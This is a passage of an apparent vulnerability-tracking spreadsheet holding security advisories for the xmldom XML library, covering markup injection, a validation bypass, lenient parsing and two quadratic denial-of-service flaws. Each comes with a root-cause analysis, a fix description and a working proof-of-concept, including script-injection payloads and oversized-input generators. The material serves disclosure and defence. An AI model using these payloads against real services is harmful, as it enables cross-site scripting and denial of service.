closing `&gt;`:

- 0.9.x (v0.9.10, `bb7a085`):
  [serializer DocType case, `lib/dom.js#L3256-L3283`](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3256-L3283)
  — the `requireWellFormed` block ([#L3259-L3269](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3259-L3269))
  validates `publicId`/`systemId`/`internalSubset` but not `name`, which is
  emitted verbatim at [#L3270](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L3270).
- 0.8.x (v0.8.13, `e5c1480`):
  [serializer DocType case, `lib/dom.js#L1914-L1946`](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1914-L1946)
  — same structure; `name` is emitted verbatim at [#L1928](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L1928).
- unscoped `xmldom` (v0.6.0, `c80a161`):
  [`lib/dom.js#L1105`](https://github.com/xmldom/xmldom/blob/c80a161172cc4d8733583bf0cf59abfa589f6d9e/lib/dom.js#L1105)
  emits `node.name` verbatim; this line predates `requireWellFormed`, so there
  is no well-formedness path at all.

### Enabling write paths

`DocumentType.name` is a plain, writable own-property, so the enabling vector
differs by line:

- **0.9.x** — `createDocumentType()` validates the name via
  `validateQualifiedName` ([`lib/dom.js#L925-L936`](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L925-L936),
  validation at [#L926](https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L926)),
  so the deliverable vector is a **direct property write**
  (`dt.name = 'html&gt;&lt;script&gt;…'`) to the unguarded own-property.
- **0.8.x** — `createDocumentType()` does **not** validate the name
  ([`lib/dom.js#L456-L464`](https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L456-L464)),
  so the malicious name is reachable directly through `createDocumentType()` as
  well as via direct property write.
- **unscoped `xmldom` (&lt;= 0.6.0)** — `createDocumentType()` does not validate
  the name ([`lib/dom.js#L286`](https://github.com/xmldom/xmldom/blob/c80a161172cc4d8733583bf0cf59abfa589f6d9e/lib/dom.js#L286)),
  same as 0.8.x.

This is the same structural root cause the sibling name-injection advisories
share: the serializer's `requireWellFormed` path validates content delimiters
but no name field, and every name-like field is a plain writable property, so
mutation / direct property-write bypasses any creation-time check.

### Root Cause

1. The serializer's `requireWellFormed` DocType block checks `publicId`,
   `systemId`, and `internalSubset` (the fields hardened by GHSA-f6ww-3ggp-fr8h)
   but has no check for `name`.
2. `DocumentType.name` is a plain writable own-property; on 0.8.x and the
   unscoped package `createDocumentType()` does not validate it either.
3. The serializer emits `name` directly between the doctype delimiters:
   `&lt;!DOCTYPE ${name}…&gt;`.

## Proof of Concept

Run against `@xmldom/xmldom` v0.9.10 (commit `bb7a085`):

```javascript
const { DOMImplementation, XMLSerializer, DOMParser } = require('@xmldom/xmldom');

const impl = new DOMImplementation();
const serializer = new XMLSerializer();

// 0.9.x createDocumentType validates the name, so overwrite it via direct property write
const dt = impl.createDocumentType('html', '', '');
dt.name = 'html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script';
const doc = impl.createDocument(null, 'r', dt);

const output = serializer.serializeToString(doc, { requireWellFormed: true });
console.log(output);
// Output: &lt;!DOCTYPE html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;r/&gt;
//
// requireWellFormed: true did NOT prevent the injection (no exception thrown).
// The injected &lt;script&gt; is well-formed XHTML that a browser would execute.
```

Confirmed runtime behavior:

- **0.9.x** — `createDocumentType()` rejects the malicious name at creation
  (`InvalidCharacterError`); a direct write to `dt.name` bypasses that, and
  `serializeToString(…, { requireWellFormed: true })` emits the breakout with no
  exception.
- **Re-parse confirmation** — re-parsing the output shows the injected
  `&lt;script&gt;` is a real second top-level element originating entirely from the
  DocType name: the parser rejects it with
  `HierarchyRequestError: Only one element can be added and only after doctype`.
  A comment-injection variant (`dt.name = 'html&gt;&lt;!--INJECTED--'`, output
  `&lt;!DOCTYPE html&gt;&lt;!--INJECTED--&gt;&lt;r/&gt;`) re-parses cleanly and the injected
  comment node is enumerable, confirming the injected node is structurally live.
- **0.8.x** (v0.8.13, `e5c1480`) — `createDocumentType('html&gt;&lt;script&gt;…', '', '')`
  accepts the malicious name directly (no creation-time validation), and
  `serializeToString(doc, null, null, { requireWellFormed: true })` produces
  `&lt;!DOCTYPE html&gt;&lt;script&gt;alert(1)&lt;/script&gt;&lt;r/&gt;` with no exception.

A browser reproduction does not apply: browsers keep `DocumentType.name`
`readonly`, so the direct-write vector cannot be reproduced in a browser DOM.
The injection is specific to xmldom exposing `name` as writable and serializing
it without a guard.

## Impact

Applications that build a `DocumentType` node with an attacker-influenced
`name` — via direct property write on any affected line, or via
`createDocumentType()` on 0.8.x and the unscoped package — and serialize the
document are vulnerable to XML/markup injection:

- **XML structure injection** — breaking out of the `&lt;!DOCTYPE …&gt;` declaration
  to inject arbitrary sibling elements, comments, or additional markup into the
  output.
- **XSS via XHTML** — if the serialized output is served as XHTML or processed
  by a browser-based XML parser, an injected `&lt;script&gt;` element (in the XHTML
  namespace) executes.
- **requireWellFormed bypass** — applications that adopted
  `requireWellFormed: true` as a mitigation for the prior injection CVEs
  (including the sibling DocType fields fixed by GHSA-f6ww-3ggp-fr8h) remain
  vulnerable through the DocType `name`.

## Fix Applied

Under `requireWellFormed`, the serializer validates the DocType `name` as a well-formed XML
`Name` and throws `InvalidStateError` when it is not — matching the sibling
`publicId`/`systemId`/`internalSubset` checks. Non-breaking and opt-in; ships on both maintained versions. No
creation-time change is made: 0.9.x already validates the name at `createDocumentType`, and the
0.8.x/unscoped creation gap cannot be closed without a breaking change, so it is left
unfixed.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dt = impl.createDocumentType('html', '', '');
dt.name = 'html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script';
const doc = impl.createDocument(null, 'r', dt);

// Default path: the ill-formed name is still emitted verbatim (injection present).
console.log(serializer.serializeToString(doc));
// &lt;!DOCTYPE html&gt;&lt;script xmlns="http://www.w3.org/1999/xhtml"&gt;alert(1)&lt;/script&gt;&lt;r/&gt;

// Opt-in path: serialization throws instead of emitting the breakout.
serializer.serializeToString(doc, { requireWellFormed: true });
// throws InvalidStateError
```

### Why the default stays verbatim

W3C DOM Parsing's require-well-formed flag defaults to false, and the browser
`XMLSerializer` emits the name verbatim in that default mode. Unconditionally
throwing would be an unjustified breaking change against that specified default,
so the guard is opt-in behind `{ requireWellFormed: true }`.

### Residual limitation

The default serialization path still emits the ill-formed DocType `name`
verbatim; protection applies only when `requireWellFormed: true` is passed. No
creation-time validation is added for the DocType `name`: 0.9.x already validates
at `createDocumentType`, and the 0.8.x/unscoped creation gap is left unfixed — it
cannot be closed without a breaking change.</t></is></c><c r="T1619" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83608</t></is></c></row><row r="1620"><c r="A1620" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1620" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1620" s="5" t="inlineStr"><is><t>CVE-2026-83609</t></is></c><c r="D1620" s="5" t="inlineStr" /><c r="E1620" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1620" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1620" s="5" t="inlineStr" /><c r="H1620" s="5" t="n"><v>0.003</v></c><c r="I1620" s="5" t="inlineStr" /><c r="J1620" s="5" t="inlineStr" /><c r="K1620" s="5" t="inlineStr" /><c r="L1620" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1620" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N1620" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1620" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1620" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1620" s="5" t="inlineStr" /><c r="R1620" s="5" t="inlineStr" /><c r="S1620" s="5" t="inlineStr"><is><t>## Summary

An embedded line terminator bypasses xmldom's always-on, WHATWG-mandated creation-time name
validation. `createElementNS`, `createAttributeNS`, `createDocumentType`, and `createAttribute` should
reject a malformed qualified name with `InvalidCharacterError`, but a name whose first line is
well-formed slips through and enters the DOM. On serialization it is emitted verbatim, so the
characters after the line terminator inject markup into the output. The injection reaches the default
serialization path, and enabling `requireWellFormed` does not prevent it.

## Details

`createElementNS`, `createAttributeNS`, and `createDocumentType` route through `validateQualifiedName`,
and `createAttribute` performs the analogous check; each validates the name with
`g.QName_exact.test(name)`. `QName_exact = reg('^', QName, '$')` inherits the `m` flag from xmldom's
shared regexp builder, so the matcher accepts any name whose first line is a valid `QName` and leaves
the remaining lines unconstrained (see Root Cause).

### Root Cause

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. `validateQualifiedName` / `createAttribute` validate with `.test()` against such a production, so a
   line terminator followed by breakout markup passes and the malformed name is stored.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.

## Proof of Concept

```js
const { DOMImplementation, XMLSerializer } = require('@xmldom/xmldom');
const impl = new DOMImplementation();

const doc = impl.createDocument('urn:x', 'root', null);
const el = doc.createElementNS('urn:x', 'a\n&gt;&lt;script&gt;x&lt;/script');  // ACCEPTED (no throw)
doc.documentElement.appendChild(el);

// DEFAULT serialization — requireWellFormed NOT set:
console.log(new XMLSerializer().serializeToString(doc));
// Observed: &lt;root xmlns="urn:x"&gt;&lt;a
// &gt;&lt;script&gt;x&lt;/script/&gt;&lt;/root&gt;          &lt;-- injected element on the default path
// Control: createElementNS('urn:x', 'bad&gt;name') throws InvalidCharacterError, confirming the check is
// active and specifically bypassed by the line terminator.
```

## Impact

- **Bypass of the always-on WHATWG creation-time name validation** (`InvalidCharacterError`): a
  malformed name the standard requires be rejected at creation is instead admitted to the DOM.
- **Markup / structure injection.** An application relying on the `create*` APIs to reject malformed
  names (the standard behavior) as a trust boundary is exposed; where the serialized output reaches an
  HTML context, downstream XSS.
- **No serializer option mitigates it.** The admitted name is emitted verbatim under *both* the default
  path and `requireWellFormed: true` — the strict serializer shares the same `m`-flagged blind spot
  (the subject of the sibling serializer advisories) — so the bypassed creation-time check was the only
  layer that could have stopped it. Demonstrated for all four `create*` sites in
  `poc_creation_strict_serialization_bypass.cjs`.

## Fix Applied

`createElementNS`, `createAttributeNS`, `createDocumentType`, and `createAttribute` now reject a name
containing a line terminator with `InvalidCharacterError` — the same result they already give for
other malformed names — because name validation now applies to the whole string. The
`requireWellFormed` serializer's name checks are corrected by the same change. The fix is
non-breaking: such a name was already invalid, and no previously-accepted well-formed name is affected.</t></is></c><c r="T1620" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83609</t></is></c></row><row r="1621"><c r="A1621" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1621" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1621" s="5" t="inlineStr"><is><t>CVE-2026-83611</t></is></c><c r="D1621" s="5" t="inlineStr" /><c r="E1621" s="5" t="inlineStr"><is><t>MODERATE</t></is></c><c r="F1621" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1621" s="5" t="inlineStr" /><c r="H1621" s="5" t="n"><v>0.004</v></c><c r="I1621" s="5" t="inlineStr" /><c r="J1621" s="5" t="inlineStr" /><c r="K1621" s="5" t="inlineStr" /><c r="L1621" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1621" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1621" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1621" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1621" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1621" s="5" t="inlineStr" /><c r="R1621" s="5" t="inlineStr" /><c r="S1621" s="5" t="inlineStr"><is><t>## Summary

xmldom's parser silently accepts a **not-well-formed end tag** whose valid name is followed by
trailing content — e.g. `&lt;/a⏎junk&gt;`. The element is closed, the trailing content is discarded, and no
error is reported, even though the XML end-tag production allows only optional whitespace after the
name and both Chromium and Firefox reject such input as `application/xml`. An application that relies
on xmldom to reject not-well-formed input therefore receives a false "valid" result for a document the
specification and browsers consider malformed.

## Details

Across every affected version, an end tag whose valid `Name` is followed by trailing content before
`&gt;` is silently accepted: the element is closed, the residue is dropped, and no error is reported. How
much leaks differs by line (see Affected Versions), but the observable weakness is the same.

On the current (`0.9.x`) line, the parser validates the end-tag name against the XML `ETag` production
with an anchored regular expression (`^ QName S? $`). That expression is compiled with the `m`
(multiline) flag by a shared builder, so `$` matches at an interior line terminator: a valid name on
the first line satisfies the anchored production and any content after the line break escapes the
check. On 0.9.x the whitespace-separated variant (`&lt;/a junk&gt;`) is already rejected; only the
line-terminator variant leaks. Older lines have no anchored end-tag validator at all, so they accept
both the line-terminator and the whitespace variant.

This is **not** content injection — the trailing content is dropped, and the resulting DOM is a normal
single-root document (`&lt;a/&gt;`). The security-relevant property is the silent acceptance of
not-well-formed input: xmldom's parse result disagrees with the specification and with browser XML
parsers, so any control that treats "xmldom parsed it without error" as "well-formed" is bypassed.

### Root Cause

On the `0.9.x` line, where the line-terminator variant specifically leaks:

1. A shared regexp builder compiles anchored productions with the `m` flag.
2. `^…$` under `m` are line anchors, not string anchors.
3. The anchored end-tag production `^ QName S? $` is therefore satisfied by the first line alone, so
   trailing content after a line terminator is neither matched nor rejected — the malformed end tag is
   accepted and the residue silently discarded.

The triggering line terminators are the ECMAScript `LineTerminator` set: U+000A, U+000D, U+2028, U+2029.
U+2028 and U+2029 are not XML whitespace, so they are non-conforming trailing content that nonetheless
leaks because the JavaScript `$` anchor treats them as line boundaries under `m`.

## Affected Versions

Both maintained versions are affected and fixed:

- **`0.9.x`** (`&gt;= 0.9.0, &lt;= 0.9.11`) → **`0.9.12`**: the anchored end-tag validator's `m` flag leaks
  the line-terminator variant. The whitespace variant (`&lt;/a junk&gt;`) is already rejected on this line.
- **`0.8.x`** (`&gt;= 0.8.0, &lt;= 0.8.14`) → **`0.8.15`**: no anchored end-tag validator at all — both the
  line-terminator and the whitespace variant are silently accepted; the fix adds a residue check.

`release-0.7.x` (`&lt;= 0.7.13`) and the unscoped `xmldom` package (range `*`, last release 0.6.0) are
**affected but will not be patched** — they are end-of-life / unmaintained. They share the older-line
behavior (both variants silently accepted, residue dropped).

## Proof of Concept

```js
const { DOMParser, XMLSerializer } = require('@xmldom/xmldom');
const doc = new DOMParser().parseFromString('&lt;a&gt;&lt;/a\njunk&gt;', 'text/xml'); // no error
console.log(new XMLSerializer().serializeToString(doc));
// Observed: &lt;a/&gt;   — the malformed end tag is accepted, "junk" silently discarded, no error reported.
// Expected (per XML spec / Chromium / Firefox): a parse error — the input is not well-formed.
```

## Impact

- **Silent acceptance of not-well-formed XML**: a document the specification and browser XML parsers
  reject is parsed without error.
- **Bypass of a well-formedness / parse-before-trust gate**: an application relying on xmldom to
  reject malformed input treats such a document as valid. Note this is an input-validation /
  parser-differential issue, not content injection — the trailing content is discarded.

## Fix Applied

The parser now reports a not-well-formed end tag whose valid name is followed by trailing content, on both `0.9.12` and `0.8.15` — previously it was accepted silently — and parsing recovers to the byte-identical DOM as before.\
On `0.9.12` the anchored end-tag validator is corrected so a line break followed by trailing content no longer satisfies it, reported as a recoverable `error` when parsing as XML and a `warning` when parsing as HTML.\
On `0.8.15`, which previously performed no end-tag residue validation, an equivalent residue check is added, reported as a recoverable `error` in both XML and HTML.\
Well-formed documents are unaffected.

Because the report is recoverable, the fix is non-breaking: no previously-parsed document begins to
throw and no serialized output changes. Consumers that want strict rejection can escalate the reported
`error` to a fatal one via the parser's error handler (`onError` in `0.9.12`, `errorHandler` in
`0.8.15`). The two versions also differ in the whitespace-separated variant (`&lt;/a junk&gt;`): `0.9.12`
already rejected it with a fatal error in XML and continues to, while `0.8.15` — which validated
neither variant — now emits the same recoverable report for both the whitespace and line-break
variants.

### Residual limitation

By default the parser still **recovers** (it does not reject the document); the reported condition is a
recoverable `error`/`warning`, not a fatal error, to avoid changing the parsed output in a patch
release. Converting this and the other not-well-formed-acceptance cases to a consistent `fatalError` —
including the broader end-tag leniency on the older versions — is deferred to the next breaking release,
tracked at [xmldom/xmldom#1074](https://github.com/xmldom/xmldom/issues/1074).</t></is></c><c r="T1621" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83611</t></is></c></row><row r="1622"><c r="A1622" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1622" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1622" s="5" t="inlineStr"><is><t>CVE-2026-83612</t></is></c><c r="D1622" s="5" t="inlineStr" /><c r="E1622" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1622" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1622" s="5" t="inlineStr" /><c r="H1622" s="5" t="n"><v>0.003</v></c><c r="I1622" s="5" t="inlineStr" /><c r="J1622" s="5" t="inlineStr" /><c r="K1622" s="5" t="inlineStr" /><c r="L1622" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom</t></is></c><c r="M1622" s="5" t="inlineStr"><is><t>0.9.12</t></is></c><c r="N1622" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1622" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1622" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1622" s="5" t="inlineStr" /><c r="R1622" s="5" t="inlineStr" /><c r="S1622" s="5" t="inlineStr"><is><t>## Summary

In HTML mode (`text/html`), a raw-text element (`script`, `style`, `textarea`, `title`) whose closing
tag differs in case from its opening tag (e.g. `&lt;/ScRiPt&gt;` for `&lt;script&gt;`) is mishandled by the
parser, producing quadratic (O(n²)) output growth — a small crafted document parses and serializes
into output orders of magnitude larger, exhausting CPU and memory. A modest input of tens of KB can
therefore cause a denial of service in any service that parses untrusted HTML with xmldom. Only HTML
mode is affected.

## Details

The parser calls `parseHtmlSpecialContent` for each raw-text element in HTML mode, matched via
`isHTMLRawTextElement` / `isHTMLEscapableRawTextElement` (so all four types — `script`, `style`,
`textarea`, `title` — are in scope). It searches for the element's closing tag with
`source.indexOf('&lt;/' + tagName + '&gt;', elStartEnd)`, a byte-for-byte case-sensitive match. A
mixed-case closing tag never matches, so the search returns `-1`, and the following
`source.substring(elStartEnd + 1, -1)` extracts text backwards from the start of the document
instead of the element's content. The function then returns `-1` to the parse loop, which cannot
advance normally and falls back to character-by-character reprocessing. Every raw-text element
re-captures all source text preceding it, so output grows as O(n²) in the number of such elements.

### Root Cause

1. **Case-sensitive close-tag search** (`lib/sax.js:549`): `source.indexOf('&lt;/' + tagName + '&gt;',
   elStartEnd)` does not fold case, contrary to the WHATWG HTML RAWTEXT end-tag-name rule.
2. **Unguarded `-1`** (`lib/sax.js:550`): `source.substring(elStartEnd + 1, elEndStart)` runs even
   when `elEndStart === -1`, extracting text backwards from position 0.
3. **Unstable progression** (`lib/sax.js:556`): the function returns `elEndStart` (`-1`), driving
   repeated character-by-character fallback in the parse loop.

## Affected Versions

Only the `0.9.x` line is affected — the amplification was introduced in `0.9.0-beta.1` when
`parseHtmlSpecialContent` was refactored, and remains through `0.9.11`. The `0.8.x` line is **not**
affected: its older `parseHtmlSpecialContent` does not amplify, despite sharing the same
case-sensitive `indexOf`.

## Proof of Concept

```js
const { DOMParser, XMLSerializer } = require('@xmldom/xmldom');

const n = 1000;
const payload = '&lt;html&gt;&lt;body&gt;' + '&lt;script&gt;x&lt;/ScRiPt&gt;'.repeat(n) + '&lt;/body&gt;&lt;/html&gt;';
const doc = new DOMParser().parseFromString(payload, 'text/html');
const out = new XMLSerializer().serializeToString(doc);
console.log(payload.length, out.length, (out.length / payload.length).toFixed(1) + 'x');
// 18026 9037063 501.3x  — an 18 KB input yields ~9 MB of output
```

Output size grows quadratically with the number of case-mismatched raw-text elements:

```
Repeats | Input len | Output len | Ratio
1       | 44        | 109        | 2.5x
100     | 1826      | 93763      | 51.3x
500     | 9026      | 2268563    | 251.3x
1000    | 18026     | 9037063    | 501.3x
2000    | 36026     | 36074063   | 1001.3x
```

Proof of Concept from @KarimTantawey (tested with `script`); the same amplification occurs for `style`,
`textarea`, and `title`.

## Impact

Small attacker payloads can force disproportionate CPU and memory usage in services that
parse and serialize untrusted HTML via xmldom. The quadratic growth means a modest-sized input
(tens of kilobytes) can produce output in the tens or hundreds of megabytes, potentially
exhausting memory or causing timeouts.

The attack only requires HTML mode (`text/html` MIME type) and mixed-case closing tags for
any of the four raw-text element types. No special configuration or error handler setup is needed.

## Severity note

The CVSS 4.0 vector scores availability only (`VA:H`, with `VC:N/VI:N`): the flaw neither discloses
nor corrupts data, but a small untrusted HTML input (tens of KB) can force output and memory in the
tens to hundreds of MB, enough to exhaust a service's heap or stall its event loop. It is reachable
with no authentication, configuration, or error-handler setup — only that the application parses
untrusted `text/html` and serializes the result.

## Fix Applied

The raw-text closing tag is now matched case-insensitively in HTML raw-text mode (per the WHATWG HTML
[RAWTEXT end-tag rule](https://html.spec.whatwg.org/multipage/parsing.html#rawtext-end-tag-name-state)),
and a missing closing tag is handled explicitly, removing the quadratic output amplification. Output
for well-formed input is unchanged. Non-breaking; 0.9.x-only.</t></is></c><c r="T1622" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83612</t></is></c></row><row r="1623"><c r="A1623" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1623" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1623" s="5" t="inlineStr"><is><t>CVE-2026-83613</t></is></c><c r="D1623" s="5" t="inlineStr" /><c r="E1623" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1623" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1623" s="5" t="inlineStr" /><c r="H1623" s="5" t="n"><v>0.003</v></c><c r="I1623" s="5" t="inlineStr" /><c r="J1623" s="5" t="inlineStr" /><c r="K1623" s="5" t="inlineStr" /><c r="L1623" s="5" t="inlineStr"><is><t>npm:@xmldom/xmldom, npm:xmldom</t></is></c><c r="M1623" s="5" t="inlineStr"><is><t>0.8.15, 0.9.12</t></is></c><c r="N1623" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1623" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1623" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1623" s="5" t="inlineStr" /><c r="R1623" s="5" t="inlineStr" /><c r="S1623" s="5" t="inlineStr"><is><t>## Summary

xmldom builds the attribute collection of every parsed element by inserting attributes one at a
time into a DOM `NamedNodeMap`. Each insertion first performs a **linear scan of all
already-inserted attributes** to enforce the DOM uniqueness rule (no two attributes with the same
qualified name / namespace+local-name). Parsing an element that carries `M` distinct attributes
therefore costs `1 + 2 + … + M = O(M²)` comparisons.

Because the trigger is simply "one element with many attributes", the attack payload is a
**fully well-formed XML document**. No malformed markup, no error recovery, and no non-default
parser options are involved — parsing completes silently with zero `warning`/`error`/`fatalError`
events. An attacker who can submit a modest, highly compressible document (a single element with
tens of thousands of attributes, ~340 KB uncompressed) can consume seconds of single-threaded CPU
per request, enabling an unauthenticated denial of service.

This is distinct from the known quadratic-**memory** namespace-map issue: it burns **CPU** and it
does not require any namespace declarations or nesting.

## Details

The DOM content handler adds each attribute of a starting element by calling
`el.setAttributeNode(attr)` in a loop:

```js
// DOMHandler.startElement
for (var i = 0; i &lt; len; i++) {
	var namespaceURI = attrs.getURI(i);
	var value = attrs.getValue(i);
	var qName = attrs.getQName(i);
	var attr = doc.createAttributeNS(namespaceURI, qName);
	attr.value = attr.nodeValue = value;
	el.setAttributeNode(attr);          // O(existing attrs) each — see below
}
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom-parser.js#L370-L387

`setAttributeNode` delegates to `NamedNodeMap.setNamedItem`, which calls `getNamedItemNS` to look
for an existing attribute with the same namespace URI and local name before appending:

```js
setNamedItem: function (attr) {
	var el = attr.ownerElement;
	if (el &amp;&amp; el !== this._ownerElement) {
		throw new DOMException(DOMException.INUSE_ATTRIBUTE_ERR);
	}
	var oldAttr = this.getNamedItemNS(attr.namespaceURI, attr.localName);  // linear scan
	if (oldAttr === attr) {
		return attr;
	}
	_addNamedNode(this._ownerElement, this, attr, oldAttr);
	return oldAttr;
},
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L612-L623

`getNamedItemNS` walks the whole list on every call:

```js
getNamedItemNS: function (namespaceURI, localName) {
	if (!namespaceURI) {
		namespaceURI = null;
	}
	var i = 0;
	while (i &lt; this.length) {
		var node = this[i];
		if (node.localName === localName &amp;&amp; node.namespaceURI === namespaceURI) {
			return node;
		}
		i++;
	}
	return null;
},
```

https://github.com/xmldom/xmldom/blob/bb7a085dc5ba1eea3212388509b97bb4b4af32b9/lib/dom.js#L702-L715

For the i-th attribute the scan visits `i-1` entries, so inserting `M` distinct attributes performs
`Θ(M²)` comparisons. There is no hash index or set keyed by name; the map is a plain
array-backed structure.

The same structure exists on 0.8.x. There `setNamedItem` dedups via
`getNamedItem(attr.nodeName)` instead of `getNamedItemNS`, but that method is likewise a full linear
scan, so the complexity is identical:

- `startElement` loop / `setAttributeNode`:
  https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom-parser.js#L159-L176
- `setNamedItem` → linear `getNamedItem`:
  https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/dom.js#L286-L308

The linear-scan `NamedNodeMap` predates the `@xmldom/xmldom` fork and is present unchanged in the
unscoped `xmldom` package back to its earliest published release. In `xmldom@0.1.0`, parsing already
inserts each attribute one at a time (`DOMHandler.startElement` loops calling
`setAttributeNS` → `setAttributeNode` → `NamedNodeMap.setNamedItem`), and `setNamedItem` dedups by
calling `getNamedItemNS`, which is a full linear `while (i--)` scan of the already-inserted
attributes — the identical `O(M²)` structure. The whole unscoped line (`0.1.0` … `0.6.0`) is
therefore affected; the earliest published tag (`0.1.0`) was verified to contain the per-insert
linear dedup scan.

## Proof of Concept

A single well-formed element with `M` distinct attributes. No malformed markup and no options:

```js
'use strict';
var DOMParser = require('@xmldom/xmldom').DOMParser;

function buildDoc(m) {
	var parts = new Array(m);
	for (var i = 0; i &lt; m; i++) parts[i] = 'a' + i + '="x"';
	return '&lt;r ' + parts.join(' ') + '/&gt;';   // &lt;r a0="x" a1="x" ... a{M-1}="x"/&gt;
}

for (var _i = 0, sizes = [2000, 4000, 8000, 16000, 32000]; _i &lt; sizes.length; _i++) {
	var m = sizes[_i];
	var xml = buildDoc(m);
	var t0 = process.hrtime.bigint();
	var doc = new DOMParser().parseFromString(xml, 'text/xml');  // silent: no error events
	var ms = Number(process.hrtime.bigint() - t0) / 1e6;
	console.log(m + ' attrs, ' + xml.length + ' bytes -&gt; ' + ms.toFixed(1) + ' ms; parsed=' +
		doc.documentElement.attributes.length);
}
```

Measured with Node.js v18.20.8 (wall-clock; absolute numbers vary by host, the **scaling** is the
load-bearing fact):

**`@xmldom/xmldom` 0.9.10:**

| M (attributes) | input bytes | time (ms) | ratio vs prev |
|---:|---:|---:|---:|
| 2000  | 18,894  | 13.4   | —     |
| 4000  | 38,894  | 38.7   | ×2.9  |
| 8000  | 78,894  | 100.8  | ×2.6  |
| 16000 | 164,894 | 406.2  | ×4.0  |
| 32000 | 340,894 | 2149.5 | ×5.3  |

**`@xmldom/xmldom` 0.8.13:**

| M (attributes) | input bytes | time (ms) |
|---:|---:|---:|
| 2000  | 18,894  | 10.6   |
| 4000  | 38,894  | 19.9   |
| 8000  | 78,894  | 75.9   |
| 16000 | 164,894 | 657.7  |
| 32000 | 340,894 | 1643.2 |

**`xmldom` (unscoped) 0.6.0:** 4000 → 28.2 ms, 8000 → 131.8 ms, 16000 → 545.2 ms (≈ ×4 per doubling).

Time grows ≈ ×4 per doubling of `M` — quadratic. About **340 KB of well-formed input costs ~1.6–2.1 s
of single-threaded CPU**, and it keeps scaling: doubling the attribute count quadruples the cost.
The document is trivially generated and compresses to a few kilobytes on the wire.

## Impact

Unauthenticated, remotely triggerable denial of service against any service that parses
attacker-influenced XML/HTML with xmldom. A single request holds one event-loop thread for seconds;
a handful of concurrent requests can saturate CPU and stall the process. Because the payload is a
plain well-formed document (one element, many attributes), it passes any "must be well-formed" gate
and reaches the parser before any application-level validation (e.g. schema checks or signature
verification) can run. The payload is highly compressible, so it is effective over compressed
transports.

## Fix Applied

Replaced the per-insert linear duplicate scan on the parse-time dedup path with a name-keyed
index, so de-duplicating an element's attributes during parse is O(M) instead of O(M²) — a
well-formed-but-hostile attribute list can no longer wedge the parse. Behavior-preserving: attribute
order and duplicate resolution (last value wins, first position kept) are byte-identical. Non-breaking
